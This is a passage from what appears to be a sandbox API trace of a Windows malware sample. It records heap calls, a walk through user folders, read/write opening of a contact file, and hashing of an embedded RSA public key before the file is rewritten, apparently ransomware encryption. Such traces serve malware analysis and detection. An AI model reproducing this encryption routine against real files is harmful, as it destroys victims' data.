(HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0180.034] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d2ec90 [0180.034] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0180.034] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0180.035] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c828a8 | out: hHeap=0x6a0000) returned 1 [0180.035] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c828a8 [0180.035] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0180.035] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0180.035] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c828a8 | out: hHeap=0x6a0000) returned 1 [0180.035] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c828a8 [0180.035] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0180.036] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0180.036] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c828a8 | out: hHeap=0x6a0000) returned 1 [0180.036] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c828a8 [0180.036] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0180.036] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0180.036] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c828a8 | out: hHeap=0x6a0000) returned 1 [0180.036] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c828a8 [0180.036] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0180.037] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0180.037] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c828a8 | out: hHeap=0x6a0000) returned 1 [0180.037] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c828a8 [0180.037] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0180.037] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0180.037] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0180.038] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0180.038] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c828a8 | out: hHeap=0x6a0000) returned 1 [0180.038] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c828a8 [0180.038] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0180.038] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0180.038] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c828a8 | out: hHeap=0x6a0000) returned 1 [0180.038] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c828a8 [0180.038] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0180.039] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0180.039] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c828a8 | out: hHeap=0x6a0000) returned 1 [0180.039] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c828a8 [0180.039] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0180.039] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0180.040] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c828a8 | out: hHeap=0x6a0000) returned 1 [0180.040] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c828a8 [0180.040] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0180.040] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0180.040] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c828a8 | out: hHeap=0x6a0000) returned 1 [0180.040] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c828a8 [0180.040] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0180.041] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0180.041] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c828a8 | out: hHeap=0x6a0000) returned 1 [0180.041] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c828a8 [0180.041] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0180.041] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0180.042] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c828a8 | out: hHeap=0x6a0000) returned 1 [0180.042] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c828a8 [0180.042] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0180.043] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0180.043] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c828a8 | out: hHeap=0x6a0000) returned 1 [0180.043] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c828a8 [0180.043] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0180.043] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0180.043] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c828a8 | out: hHeap=0x6a0000) returned 1 [0180.044] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c828a8 [0180.044] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0180.044] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0180.045] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c828a8 | out: hHeap=0x6a0000) returned 1 [0180.045] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c828a8 [0180.045] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0180.045] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0180.045] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0180.045] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0180.046] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c828a8 | out: hHeap=0x6a0000) returned 1 [0180.046] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c828a8 [0180.046] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0180.046] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0180.047] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c828a8 | out: hHeap=0x6a0000) returned 1 [0180.047] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c828a8 [0180.047] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0180.047] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0180.047] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c828a8 | out: hHeap=0x6a0000) returned 1 [0180.047] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c828a8 [0180.048] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0180.048] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0180.048] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c828a8 | out: hHeap=0x6a0000) returned 1 [0180.048] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c828a8 [0180.048] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0180.048] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0180.049] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c828a8 | out: hHeap=0x6a0000) returned 1 [0180.049] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c828a8 [0180.049] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0180.049] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0180.049] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c828a8 | out: hHeap=0x6a0000) returned 1 [0180.049] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c828a8 [0180.049] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0180.049] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0180.050] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0180.050] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0180.050] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c828a8 | out: hHeap=0x6a0000) returned 1 [0180.050] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c828a8 [0180.050] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0180.051] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0180.051] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c828a8 | out: hHeap=0x6a0000) returned 1 [0180.051] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c828a8 [0180.051] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0180.051] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0180.052] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c828a8 | out: hHeap=0x6a0000) returned 1 [0180.052] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c828a8 [0180.052] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0180.052] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0180.052] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c828a8 | out: hHeap=0x6a0000) returned 1 [0180.052] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c828a8 [0180.052] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0180.052] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Application Data\\") returned="Application Data\\" [0180.052] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0180.052] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0180.052] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0180.053] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27b58 [0180.053] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0180.053] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0180.053] PathFindFileNameW (pszPath="") returned="" [0180.053] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c828a8 [0180.053] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Application Data\\*" (normalized: "c:\\users\\keecfmwgj\\application data\\*"), lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x9955cf30, ftLastAccessTime.dwHighDateTime=0x1d8a744, ftLastWriteTime.dwLowDateTime=0x9955cf30, ftLastWriteTime.dwHighDateTime=0x1d8a744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Roaming", cAlternateFileName="")) returned 0xffffffff [0180.055] PeekMessageW (in: lpMsg=0x30fff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fff08) returned 0 [0180.055] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f4c8 [0180.055] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0180.055] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f2d0 [0180.055] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0180.055] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Contacts\\") returned="Contacts\\" [0180.055] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27b58 [0180.055] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0180.055] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0180.055] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27b30 [0180.055] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0180.055] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0180.055] PathFindFileNameW (pszPath="") returned="" [0180.055] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f2d0 [0180.055] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Contacts\\*" (normalized: "c:\\users\\keecfmwgj\\contacts\\*"), lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e7f6e20, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cbfa10 [0180.056] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e7f6e20, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0180.056] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7996bf30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf0fefd94, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x10b1e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Administrator.contact", cAlternateFileName="ADMINI~1.CON")) returned 1 [0180.056] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f2d0 [0180.056] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0180.056] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Contacts\\Administrator.contact") returned=".contact" [0180.056] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Contacts\\Administrator.contact" (normalized: "c:\\users\\keecfmwgj\\contacts\\administrator.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0180.058] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=68382) returned 1 [0180.058] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0180.077] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x10af8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0180.077] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0180.095] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0180.111] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0180.111] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0180.111] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0x10b1e, lpOverlapped=0x0) returned 1 [0180.113] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0180.113] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2c4afd0 [0180.113] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0180.113] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0180.129] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea700) returned 1 [0180.133] CryptCreateHash (in: hProv=0x6ea700, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0180.133] CryptHashData (hHash=0x2cbfa50, pbData=0x2c4afd0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0180.133] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0180.133] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c443a8 [0180.133] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x2c443a8, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c443a8, pdwDataLen=0x30ffa54) returned 1 [0180.165] GetLastError () returned 0x0 [0180.191] SetLastError (dwErrCode=0x0) [0180.224] GetLastError () returned 0x0 [0180.224] SetLastError (dwErrCode=0x0) [0180.224] GetLastError () returned 0x0 [0180.224] SetLastError (dwErrCode=0x0) [0180.284] GetLastError () returned 0x0 [0180.284] SetLastError (dwErrCode=0x0) [0180.284] GetLastError () returned 0x0 [0180.284] SetLastError (dwErrCode=0x0) [0180.284] GetLastError () returned 0x0 [0180.284] SetLastError (dwErrCode=0x0) [0180.284] GetLastError () returned 0x0 [0180.284] SetLastError (dwErrCode=0x0) [0180.284] GetLastError () returned 0x0 [0180.284] SetLastError (dwErrCode=0x0) [0180.284] GetLastError () returned 0x0 [0180.284] SetLastError (dwErrCode=0x0) [0180.284] GetLastError () returned 0x0 [0180.284] SetLastError (dwErrCode=0x0) [0180.284] GetLastError () returned 0x0 [0180.284] SetLastError (dwErrCode=0x0) [0180.284] GetLastError () returned 0x0 [0180.285] SetLastError (dwErrCode=0x0) [0180.285] GetLastError () returned 0x0 [0180.285] SetLastError (dwErrCode=0x0) [0180.285] GetLastError () returned 0x0 [0180.285] SetLastError (dwErrCode=0x0) [0180.285] GetLastError () returned 0x0 [0180.285] SetLastError (dwErrCode=0x0) [0180.285] GetLastError () returned 0x0 [0180.285] SetLastError (dwErrCode=0x0) [0180.285] GetLastError () returned 0x0 [0180.285] SetLastError (dwErrCode=0x0) [0180.285] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27b30 [0180.285] GetLastError () returned 0x0 [0180.285] SetLastError (dwErrCode=0x0) [0180.285] GetLastError () returned 0x0 [0180.285] SetLastError (dwErrCode=0x0) [0180.285] GetLastError () returned 0x0 [0180.285] SetLastError (dwErrCode=0x0) [0180.285] GetLastError () returned 0x0 [0180.285] SetLastError (dwErrCode=0x0) [0180.285] GetLastError () returned 0x0 [0180.285] SetLastError (dwErrCode=0x0) [0180.285] GetLastError () returned 0x0 [0180.285] SetLastError (dwErrCode=0x0) [0180.286] GetLastError () returned 0x0 [0180.286] SetLastError (dwErrCode=0x0) [0180.286] GetLastError () returned 0x0 [0180.286] SetLastError (dwErrCode=0x0) [0180.286] GetLastError () returned 0x0 [0180.286] SetLastError (dwErrCode=0x0) [0180.286] GetLastError () returned 0x0 [0180.286] SetLastError (dwErrCode=0x0) [0180.286] GetLastError () returned 0x0 [0180.286] SetLastError (dwErrCode=0x0) [0180.286] GetLastError () returned 0x0 [0180.286] SetLastError (dwErrCode=0x0) [0180.286] GetLastError () returned 0x0 [0180.286] SetLastError (dwErrCode=0x0) [0180.286] GetLastError () returned 0x0 [0180.286] SetLastError (dwErrCode=0x0) [0180.286] GetLastError () returned 0x0 [0180.286] SetLastError (dwErrCode=0x0) [0180.286] GetLastError () returned 0x0 [0180.286] SetLastError (dwErrCode=0x0) [0180.286] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0180.287] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b30 | out: hHeap=0x6a0000) returned 1 [0180.287] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c443a8 | out: hHeap=0x6a0000) returned 1 [0180.287] CryptDestroyHash (hHash=0x2cbfa50) returned 1 [0180.287] CryptReleaseContext (hProv=0x6ea700, dwFlags=0x0) returned 1 [0180.288] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4afd0 | out: hHeap=0x6a0000) returned 1 [0180.304] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0180.306] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0180.306] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0180.306] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0180.306] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0180.306] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0180.306] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10b20) returned 0x2d32670 [0180.308] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0180.308] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0180.309] RtlAllocateHeap (HeapHandle=0x6a0000, 